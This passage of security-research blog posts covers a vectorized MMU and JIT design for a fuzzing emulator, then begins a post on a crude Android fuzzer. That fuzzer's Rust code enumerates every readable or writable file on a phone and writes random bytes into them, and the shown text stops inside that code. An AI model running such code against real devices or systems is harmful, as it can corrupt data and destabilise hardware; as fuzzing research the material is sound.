<p>This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the master, we can instead maintain a <code class="language-plaintext highlighter-rouge">HashSet</code> of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated <code class="language-plaintext highlighter-rouge">HashSet</code>, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this <code class="language-plaintext highlighter-rouge">HashSet</code> with the <code class="language-plaintext highlighter-rouge">aliased</code> bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions.</p>
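<p>As a sketch of the idea (a map from contents to a page id stands in for the real set of backing pages): identical page contents share one backing allocation and the page tables alias it.</p>

```rust
use std::collections::HashMap;

struct Dedup {
    backing: Vec<Vec<u8>>,          // one allocation per unique page
    index: HashMap<Vec<u8>, usize>, // contents -> backing page id
}

impl Dedup {
    /// Add a page, returning the id of the (possibly shared) backing page
    fn add(&mut self, contents: Vec<u8>) -> usize {
        if let Some(&id) = self.index.get(&contents) {
            return id; // already present: alias the existing backing page
        }
        let id = self.backing.len();
        self.backing.push(contents.clone());
        self.index.insert(contents, id);
        id
    }
}

fn main() {
    let mut dedup = Dedup { backing: Vec::new(), index: HashMap::new() };
    let a = dedup.add(vec![0u8; 8]);
    let b = dedup.add(vec![0u8; 8]);    // a second page of zeros
    let c = dedup.add(vec![0x41u8; 8]);
    assert_eq!(a, b);                   // zeros share one backing page
    assert_ne!(a, c);
    assert_eq!(dedup.backing.len(), 2); // only two unique pages committed
}
```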
<p>Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other <code class="language-plaintext highlighter-rouge">aliased</code> memory, it can be <code class="language-plaintext highlighter-rouge">cow</code> memory and cloned if modified.</p>
<p>The gain from this is minimal in practice, but the code complexity increase given we already handle <code class="language-plaintext highlighter-rouge">cow</code> and <code class="language-plaintext highlighter-rouge">aliased</code> memory is so little that there’s really no reason to <em>not</em> do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.</p>
<p>For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.</p>
<p><img src="/assets/cow_and_dedup.png" alt="cow_and_dedup" /></p>
<hr />
<h1 id="performance">Performance</h1>
<p>Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.</p>
<p>There are two important aspects to performance:</p>
<ul>
<li>The JIT</li>
<li>Injecting fuzz cases / allocating memory</li>
</ul>
<p>The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible for bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.</p>
<p>Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).</p>
<p>Further the VM may dynamically allocate memory via <code class="language-plaintext highlighter-rouge">malloc()</code> which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.</p>
<h1 id="the-jit--il">The JIT / IL</h1>
<p>We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.</p>
<p>When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.</p>
<h4 id="differing-addresses">Differing addresses</h4>
<p>Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).</p>
<p>Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.</p>
<p>The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.</p>
<p>We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.</p>
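<p>The scalar write-side logic from the last two paragraphs can be sketched as follows (bit positions are illustrative, and the real dirty list also stores the translated address alongside the guest address):</p>

```rust
const DIRTY: u64   = 1 << 0; // assumed bit positions, for illustration
const ALIASED: u64 = 1 << 1;

/// Returns `false` if the write must fault (e.g. to trigger CoW handling).
/// Once a page is dirty, both the dirty-list append and the aliased check
/// are skipped, since dirty memory can never be aliased.
fn mark_dirty(entry: &mut u64, guest: u64, dirty_list: &mut Vec<u64>) -> bool {
    if *entry & DIRTY != 0 {
        return true; // fast path: already dirty, already in the list
    }
    if *entry & ALIASED != 0 {
        return false; // aliased memory cannot be written in place
    }
    *entry |= DIRTY;
    dirty_list.push(guest); // gated by the dirty bit: no duplicate entries
    true
}

fn main() {
    let mut dirty_list = Vec::new();
    let mut entry = 0x1000u64;
    assert!(mark_dirty(&mut entry, 0x7fff_0000, &mut dirty_list));
    assert!(mark_dirty(&mut entry, 0x7fff_0000, &mut dirty_list));
    assert_eq!(dirty_list.len(), 1); // second write skipped the append
    let mut aliased = 0x2000u64 | ALIASED;
    assert!(!mark_dirty(&mut aliased, 0x1234, &mut dirty_list));
}
```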
<h4 id="vectorized-translation">Vectorized translation</h4>
<p>However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.</p>
<p>To handle translations failing at different points, we mask off VMs as they fail. At the end of the translation we determine if <em>any</em> VM failed, and if so we report the failure correctly for all VMs that failed at any point during the translation. This allows us to get a correct <code class="language-plaintext highlighter-rouge">caused_vmexit</code> mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.</p>
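<p>The masking can be sketched as a scalar model of the vectorized logic: lanes are masked off as they fail, and one walk reports every lane that failed at any stage.</p>

```rust
/// `stages[s][lane]` is true if that lane fails at stage `s` (e.g. a
/// non-present entry at some level, or a permission check). Returns the
/// accumulated caused_vmexit mask for all 8 lanes.
fn translate_all(stages: &[[bool; 8]]) -> u8 {
    let mut caused_vmexit = 0u8;
    let mut alive = 0xffu8;
    for stage in stages {
        for lane in 0..8 {
            if alive & (1 << lane) != 0 && stage[lane] {
                caused_vmexit |= 1 << lane; // record the failing lane
                alive &= !(1 << lane);      // mask it off for later stages
            }
        }
    }
    caused_vmexit
}

fn main() {
    // Lane 0 fails at the first stage, lane 3 at a later one: a single
    // translation still reports both in the final mask
    let mut s0 = [false; 8]; s0[0] = true;
    let mut s1 = [false; 8]; s1[3] = true;
    assert_eq!(translate_all(&[s0, s1]), 0b0000_1001);
    assert_eq!(translate_all(&[[false; 8]]), 0);
}
```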
<h4 id="vectorized-dirty-list-updating">Vectorized dirty list updating</h4>
<p>Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.</p>
<p>To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.</p>
<p>However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.</p>
<h1 id="il-mmu-routines">IL MMU routines</h1>
<p>I’m going to have a whole blog on my IL, but it’s a simple SSA IL.</p>
<p>Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.</p>
<p>For example, a 4-byte translate for writing of <code class="language-plaintext highlighter-rouge">rsp+0x50</code> occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the <code class="language-plaintext highlighter-rouge">rsp+0x50</code> value is tied to a certain version of <code class="language-plaintext highlighter-rouge">rsp</code>, thus changes to <code class="language-plaintext highlighter-rouge">rsp</code> do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.</p>
<p>Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.</p>
<p>Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.</p>
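<p>The reuse rule can be sketched as a cache keyed by the SSA value computing the address (names here are illustrative, not from the actual IL): a cached translation is reusable when it is a superset of the requested access.</p>

```rust
use std::collections::HashMap;

#[derive(Clone, Copy)]
struct Translation { host: u64, size: u8, write: bool }

struct TranslationCache { by_ssa: HashMap<u32, Translation> }

impl TranslationCache {
    /// Reuse a translation if the cached one is a superset: a write covers
    /// a read, and a larger size covers a smaller one
    fn lookup(&self, ssa: u32, size: u8, write: bool) -> Option<Translation> {
        self.by_ssa.get(&ssa).copied()
            .filter(|t| t.size >= size && (t.write || !write))
    }
}

fn main() {
    let mut cache = TranslationCache { by_ssa: HashMap::new() };
    // A 4-byte write translate of e.g. `rsp+0x50`, tied to SSA value 7
    cache.by_ssa.insert(7, Translation { host: 0x5000, size: 4, write: true });
    assert!(cache.lookup(7, 4, false).is_some()); // read reuses the write
    assert!(cache.lookup(7, 2, true).is_some());  // smaller write reuses it
    assert!(cache.lookup(7, 8, false).is_none()); // larger access: re-walk
    assert!(cache.lookup(9, 4, false).is_none()); // different SSA value
}
```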
<p>Since it’s possible a VM exit occurs and memory/permissions are changed, I must invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.</p>
<h1 id="the-performance-numbers">The performance numbers</h1>
<p>These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.</p>
<p>These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.</p>
<p>The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Write: false | opsize: 1 | Diverge: false | Translate 37.8132 cycles | Access 10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate 39.0831 cycles | Access 11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate 39.7298 cycles | Access 10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate 35.2704 cycles | Access 9.6881 cycles
Write: true | opsize: 1 | Diverge: false | Translate 44.9504 cycles | Access 16.6908 cycles
Write: true | opsize: 2 | Diverge: false | Translate 45.9377 cycles | Access 15.0110 cycles
Write: true | opsize: 4 | Diverge: false | Translate 44.8083 cycles | Access 16.0191 cycles
Write: true | opsize: 8 | Diverge: false | Translate 39.7565 cycles | Access 8.6500 cycles
Write: false | opsize: 1 | Diverge: true | Translate 140.2084 cycles | Access 16.6964 cycles
Write: false | opsize: 2 | Diverge: true | Translate 141.0708 cycles | Access 16.7114 cycles
Write: false | opsize: 4 | Diverge: true | Translate 140.0859 cycles | Access 16.6728 cycles
Write: false | opsize: 8 | Diverge: true | Translate 137.5321 cycles | Access 14.1959 cycles
Write: true | opsize: 1 | Diverge: true | Translate 158.5673 cycles | Access 22.9880 cycles
Write: true | opsize: 2 | Diverge: true | Translate 159.3837 cycles | Access 21.2704 cycles
Write: true | opsize: 4 | Diverge: true | Translate 156.8409 cycles | Access 22.9207 cycles
Write: true | opsize: 8 | Diverge: true | Translate 156.7783 cycles | Access 16.6400 cycles
</code></pre></div></div>
<h4 id="performance-analysis">Performance analysis</h4>
<p>These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!</p>
<h1 id="tlbs-not-implemented-as-of-this-writing">TLBs (not implemented as of this writing)</h1>
<p>Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).</p>
<p>I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…</p>
<h1 id="fast-injectionpermission-modifications">Fast injection/permission modifications</h1>
<p>To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.</p>
<p>I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.</p>
<h4 id="vectorized-broadcast">Vectorized broadcast</h4>
<p>This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.</p>
<h4 id="vectorized-memset">Vectorized memset</h4>
<p>Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.</p>
<p>This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like <code class="language-plaintext highlighter-rouge">malloc()</code>.</p>
<h4 id="vectorized-write-multiple">Vectorized write-multiple</h4>
<p>This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.</p>
<p>Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.</p>
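<p>The padding step is simple enough to sketch directly:</p>

```rust
/// Pad a fuzz input out to the 8-byte size alignment the write-multiple
/// routine requires, filling with zeros
fn pad_input(mut input: Vec<u8>) -> Vec<u8> {
    let rem = input.len() % 8;
    if rem != 0 {
        input.resize(input.len() + (8 - rem), 0);
    }
    input
}

fn main() {
    assert_eq!(pad_input(vec![1; 5]).len(), 8);
    assert_eq!(pad_input(vec![2; 16]).len(), 16); // already aligned
}
```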
<h1 id="are-these-fast-routines-really-needed">Are these fast routines really needed?</h1>
<p>For example, here are the benchmarks for the reference Rust implementation with a page table of shape: <code class="language-plaintext highlighter-rouge">[16, 16, 16, 13, 3]</code></p>
<p><em>Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0000 seconds
1 MiB of deduped memory added in 0.1873 seconds
1024 byte chunks read per second 30115.5741
1024 byte chunks written per second 29243.0394
1024 byte chunks memset per second 29340.3969
1024 byte chunks permed per second 34971.7952
1024 byte chunks write multiple per second 6864.1243
</code></pre></div></div>
<p>And the AVX-512 handwritten implementation on the same machine and same shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0000 seconds
1 MiB of deduped memory added in 0.1878 seconds
1024 byte chunks read per second 30073.5090
1024 byte chunks written per second 770678.8377
1024 byte chunks memset per second 777488.8143
1024 byte chunks permed per second 780162.1310
1024 byte chunks write multiple per second 751352.4038
</code></pre></div></div>
<p>Effectively a 25x speedup for the same result!</p>
<p>With a larger page size (<code class="language-plaintext highlighter-rouge">[16, 16, 16, 6, 10]</code>) this number goes down as I can use the old translation longer and I spend less time translating pages:</p>
<p>Rust implementations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0001 seconds
1 MiB of deduped memory added in 0.0829 seconds
1024 byte chunks read per second 30201.6634
1024 byte chunks written per second 31850.8188
1024 byte chunks memset per second 31818.1619
1024 byte chunks permed per second 34690.8332
1024 byte chunks write multiple per second 7345.5057
</code></pre></div></div>
<p>Hand-optimized implementations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0001 seconds
1 MiB of deduped memory added in 0.0826 seconds
1024 byte chunks read per second 30168.3047
1024 byte chunks written per second 32993840.4624
1024 byte chunks memset per second 33131493.5139
1024 byte chunks permed per second 36606185.6217
1024 byte chunks write multiple per second 10775641.4470
</code></pre></div></div>
<p>In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!</p>
<hr />
<h1 id="future-improvementsideas">Future improvements/ideas</h1>
<p>Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.</p>
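<p>The extension behavior described above boils down to something like this:</p>

```rust
/// Treat guest addresses as `bits` wide and either sign- or zero-extend
/// them up to 64 bits, matching the architecture being modeled
fn extend(addr: u64, bits: u32, signed: bool) -> u64 {
    let shift = 64 - bits;
    if signed {
        // Arithmetic shift replicates the top bit of the partial address
        (((addr << shift) as i64) >> shift) as u64
    } else {
        // Logical shift zero-fills, also truncating any stray high bits
        (addr << shift) >> shift
    }
}

fn main() {
    assert_eq!(extend(0x8000, 16, true), 0xffff_ffff_ffff_8000);
    assert_eq!(extend(0x8000, 16, false), 0x8000);
    assert_eq!(extend(0x1234, 16, true), 0x1234);
}
```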
<p>I could add more fast-injection routines as needed.</p>
<p>I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.</p>
Writing the worlds worst Android fuzzer, and then improving it2018-10-18T09:57:20+00:002018-10-18T09:57:20+00:00https://gamozolabs.github.io/fuzzing/2018/10/18/terrible_android_fuzzer
<p><em>So slimy it belongs in the slime tree</em></p>
<p><img src="/assets/slimetree.jpg" alt="Why" /></p>
<h1 id="changelog">Changelog</h1>
<table>
<thead>
<tr>
<th>Date</th>
<th>Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>2018-10-18</td>
<td>Initial</td>
</tr>
</tbody>
</table>
<h1 id="tweeter">Tweeter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.</p>
<h1 id="disclaimer">Disclaimer</h1>
<p>I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.</p>
<h1 id="give-me-the-code">Give me the code</h1>
<p><a href="https://github.com/gamozolabs/slime_tree">Slime Tree Repo</a></p>
<h1 id="intro">Intro</h1>
<p>Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.</p>
<p>When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into <code class="language-plaintext highlighter-rouge">/dev</code> and run <code class="language-plaintext highlighter-rouge">ls -l</code>, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.</p>
<p>To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use <code class="language-plaintext highlighter-rouge">adb shell</code> and thus we’re running as <code class="language-plaintext highlighter-rouge">u:r:shell:s0</code>.</p>
<h1 id="recursive-listdiring">Recursive listdiring</h1>
<p>Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Recursively list all files starting at the path specified by `dir`, saving</span>
<span class="c">/// all files to `output_list`</span>
<span class="k">fn</span> <span class="nf">listdirs</span><span class="p">(</span><span class="n">dir</span><span class="p">:</span> <span class="o">&</span><span class="n">Path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">:</span> <span class="o">&</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// List the directory</span>
<span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_dir</span><span class="p">(</span><span class="n">dir</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">list</span><span class="p">)</span> <span class="o">=</span> <span class="n">list</span> <span class="p">{</span>
<span class="c">// Go through each entry in the directory, if we were able to list the</span>
<span class="c">// directory safely</span>
<span class="k">for</span> <span class="n">entry</span> <span class="n">in</span> <span class="n">list</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">entry</span><span class="p">)</span> <span class="o">=</span> <span class="n">entry</span> <span class="p">{</span>
<span class="c">// Get the path representing the directory entry</span>
<span class="k">let</span> <span class="n">path</span> <span class="o">=</span> <span class="n">entry</span><span class="nf">.path</span><span class="p">();</span>
<span class="c">// Get the metadata and discard errors</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">metadata</span><span class="p">)</span> <span class="o">=</span> <span class="n">path</span><span class="nf">.symlink_metadata</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Skip this file if it's a symlink</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_symlink</span><span class="p">()</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Recurse if this is a directory</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_dir</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Add this to the directory listing if it's a file</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_file</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">can_read</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="k">let</span> <span class="n">can_write</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="n">output_list</span><span class="nf">.push</span><span class="p">((</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Woo, that was pretty simple. To get a full directory listing of the whole phone we can just:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">dirlisting</span><span class="p">);</span>
</code></pre></div></div>
<h1 id="fuzzing">Fuzzing</h1>
<p>So now we have a list of all files. We can now use this for manual analysis: look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find good bugs, but maybe we can automate this process?</p>
<p>What if we just randomly try to read from and write to the files? We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">listing</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">listing</span><span class="p">);</span>
<span class="c">// Fuzz buffer</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="c">// Fuzz forever</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="c">// Pick a random file</span>
<span class="k">let</span> <span class="n">rand_file</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">listing</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">)</span> <span class="o">=</span> <span class="o">&</span><span class="n">listing</span><span class="p">[</span><span class="n">rand_file</span><span class="p">];</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"{:?}</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_read</span> <span class="p">{</span>
<span class="c">// Fuzz by reading</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_write</span> <span class="p">{</span>
<span class="c">// Fuzz by writing</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
